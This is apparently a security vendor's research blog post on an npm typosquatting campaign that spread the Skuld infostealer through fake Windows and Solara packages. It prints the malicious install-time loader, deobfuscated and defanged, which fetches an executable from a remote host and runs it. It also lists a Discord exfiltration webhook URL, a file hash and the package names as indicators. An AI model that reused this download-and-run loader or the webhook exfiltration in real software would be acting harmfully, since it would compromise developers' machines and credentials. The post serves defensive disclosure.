Research
Security News
Kirill Boychenko
December 18, 2024
Socket’s threat research team identified a malware campaign infiltrating the npm ecosystem, deploying the Skuld infostealer just weeks after a similar attack targeted Roblox developers. The threat actor, identified as “k303903” on npm registry, disguised malicious packages — windows-confirm, windows-version-check, downloadsolara, and solara-config — as legitimate tools. Before their removal, these packages compromised hundreds of machines, demonstrating how even low-complexity attacks can rapidly gain traction.
The npm registry’s swift response helped limit the spread and impact of this malicious campaign. However, the persistent nature of such attacks and the reuse of open source malware like the Skuld infostealer highlight that this issue is far from disappearing. By studying these recent incidents, developers and organizations can strengthen their defenses, safeguard credentials, and adopt more vigilant development practices.
December 20 - 31, 2024 update: The threat actors identified as “shegotit2” and "hnfwmmo1" on the npm registry are highly likely the same individual as “k303903”, based on their use of identical or highly similar tactics, techniques, and procedures (TTPs). Furthermore, Datadog Security Labs has confirmed another threat actor, “pressurized”, on the npm registry, who is also highly likely the same threat actor operating under a different account. This conclusion is supported by the consistent use of the same TTPs to infiltrate the npm ecosystem with malware. We have petitioned the npm registry to remove all identified malicious packages that may still be active. Indicators of Compromise (IOCs) associated with all identified aliases are detailed in the dedicated IOC section below.
This latest malicious campaign delivering the Skuld infostealer marks the second time in two months that this malware has targeted npm developers. It closely mirrors a previous attack reported by Socket on November 8, 2024, where Roblox developers were compromised via npm packages infected with Skuld and Blank Grabber malware. Further supporting this, Datadog Security Labs published research on November 22, 2024, that reinforced the scale and sophistication of the threat. In December 2024, the attack has resurfaced, where a threat actor used typosquatting and simple yet effective techniques to compromise development machines and exfiltrate sensitive data.
The return of the Skuld infostealer to npm highlights a recurring pattern: attackers gain a foothold, achieve brief success, and swiftly adapt by reintroducing the threat with new packaging and distribution strategies. The December 2024 campaign exhibits the same familiar hallmarks: obfuscation, typosquatting, deceptive tactics, reliance on commodity malware, and common deployment methods.
Screenshot showcasing Skuld’s ability to steal passwords, cookies, sensitive files, and browsing history from Chromium and Gecko-based browsers.
The following malicious code snippet, deobfuscated, defanged, and annotated with comments, offers insight into the threat actor’s methods.
const fs = require("fs-extra");
const path = require("path");
const fetch = require("node-fetch");
const { exec } = require("child_process");
const exeFilePath = path.join(__dirname, "download.exe");
// Downloads and writes the malicious binary to disk, then executes it.
async function downloadFile(url, dest) {
const response = await fetch(url);
if (!response.ok) {
throw new Error("HTTP error! status: " + response.status);
}
const buffer = await response.buffer();
await fs.writeFile(dest, buffer);
}
async function runExecutable() {
try {
// The URL is disguised to appear legitimate, using a Cloudflare-like domain.
await downloadFile("hxxps://alternatives-suits-obtained-bowl.trycloudflare[.]com/page", exeFilePath);
exec(exeFilePath, (error) => {
if (error) {
console.error("Error running the executable: " + error);
}
});
} catch (err) {
console.error("Download error: " + err);
}
}
runExecutable();The threat actor employed Obfuscator.io, a widely used open source tool, to obfuscate the package code and evade initial detection. The Skuld infostealer payload was hosted on URLs designed to appear legitimate, including a domain impersonating Cloudflare. Upon installation, the malicious package silently fetched and executed the malware under the filename download.exe (SHA256: 27b86c1a24a1c97952397943f7b7ef21ee6859145556fe1b197e89074672bd07).
Socket AI Scanner’s analysis, including contextual details about the malicious package.
The threat actor k303903 employed typosquatting by uploading npm packages that mimicked well-known productivity and web development libraries, including masquerading as Windows-related utilities and Solara — a Python framework for building interactive web applications. By publishing packages that appeared legitimate or closely related to these tools, the threat actor aimed to deceive developers into installing them without thoroughly inspecting the package code.
For data exfiltration, the threat actor used a Discord webhook (hxxps://discord[.]com/api/webhooks/1316651715591667752/GNxf9DlNvCZmJ27gRfOlHCEVgvOG-kYbj6d2h5zaX48DpP41elqDEdBvoK1y4F1gpbbw), enabling data transfers and establishing command and control (C2) operations. The use of widely available, open source tools and services kept operational costs low while maximizing the campaign’s reach. To further deceive developers, the threat actor used legitimate-looking commands and paths to fetch the executable payload from a seemingly trustworthy source and from a legitimate service replit.dev. Although trivial to set up, Discord webhooks are a very common method for data exfiltration, allowing threat actors to blend into legitimate developer communication channels and testing environments.
The threat actor posing their malicious package as a legitimate library to deceive users.
The malicious packages were downloaded more than 600 times before they were removed. Although the npm registry responded quickly — taking down the initial test package aaaa89852889 within one day and the subsequent, above-mentioned packages within four to five days — the impact on affected users was significant. Credentials, tokens, and other sensitive data were likely stolen, jeopardizing both individual developers and organizational networks. Short-lived campaigns like this can have long-lasting consequences, as compromised credentials may be weaponized well after the malicious packages are removed.
This attack mirrors the November 2024 incident, highlighting a troubling pattern: threat actors are pivoting rapidly, reusing known malware strains, and refining their deception techniques. The continued use of the Skuld infostealer demonstrates how commodity malware can cause devastating damage when distributed through trusted supply chains.
Securing your development environment requires a layered approach. While basic measures like verifying package authorship and relying on trusted repositories are important, using automation and specialized tools is essential to keep up with rapidly evolving threats. Deploying free and real-time supply chain security tools, such as Socket’s free GitHub app, CLI, and browser extension, can intercept malicious code early in the development lifecycle. These tools scan pull requests and installations to block harmful dependencies before they integrate into your environment.
windows-confirmwindows-version-checkdownloadsolarasolara-configaaaa89852889o7rcyti43qvbootstrapper-solarasolara-upgradeatlantis-apixeno-apicore-builderupgrade-solaraxeno-builderget-matchasolara-buildersolara-cleanupsolara-installersolarainstallerpowerupdatewindows.solarawindowsversionupdatesolaramatcherdeathballupdkernelsantibyfronprogramcleanuprobloxintsolaraexecutorxeno.dllSubscribe to our newsletter
Get notified when we publish new security blog posts!
Try it now
Security News
Fluent Assertions is facing backlash after dropping the Apache license for a commercial model, leaving users blindsided and questioning contributor rights.
Research
Security News
Socket researchers uncover the risks of a malicious Python package targeting Discord developers.
Security News
The UK is proposing a bold ban on ransomware payments by public entities to disrupt cybercrime, protect critical services, and lead global cybersecurity efforts.